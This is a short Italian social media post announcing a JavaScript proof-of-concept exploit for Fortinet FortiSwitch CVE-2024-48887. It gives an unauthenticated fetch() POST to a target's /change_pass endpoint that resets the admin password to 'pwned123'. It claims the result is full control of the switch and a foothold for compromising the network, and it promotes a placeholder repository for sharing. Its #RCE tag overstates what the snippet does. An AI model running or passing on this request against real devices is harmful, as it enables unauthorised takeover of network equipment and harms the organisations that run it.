
uno snippet JavaScript leggero che mostra come modifiche non autorizzate alle password possano essere innescate su endpoint GUI Fortinet FortiSwitch vulnerabili.
🚨 FortiSwitch CVE-2024-48887 PoC (JavaScript) 🚨
🔥 Ho appena pubblicato uno snippet JavaScript leggero che dimostra come sia possibile attivare modifiche non autorizzate della password sugli endpoint GUI Fortinet FortiSwitch vulnerabili.
🛠️ Sulla vulnerabilità: Un attaccante può creare una semplice richiesta fetch() per manipolare le impostazioni della password senza alcuna autenticazione, prendendo di mira direttamente le varianti dell'endpoint /change_pass.
fetch('http://target-ip/change_pass', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
username: 'admin',
newpass: 'pwned123',
confirm: 'pwned123'
})
})
.then(res => res.text())
.then(data => console.log('Response:', data));
💡 Impatto: pieno controllo dello switch, potenziale movimento laterale e compromissione della rete.
📁 Repo: github.com/yourusername/CVE-2024-48887-FortiSwitch-Exploit ⭐ Fai una stella al repo e condividilo con i tuoi colleghi infosec!
📢 Segui l'analisi completa e gli avvisi in tempo reale via @cybersecplayground
#JavaScript #infosec #bugbounty #CVE2024 #Fortinet #FortiSwitch #RCE #exploitdev #cybersecurity #PoC #github #OSINT #cybersecplayground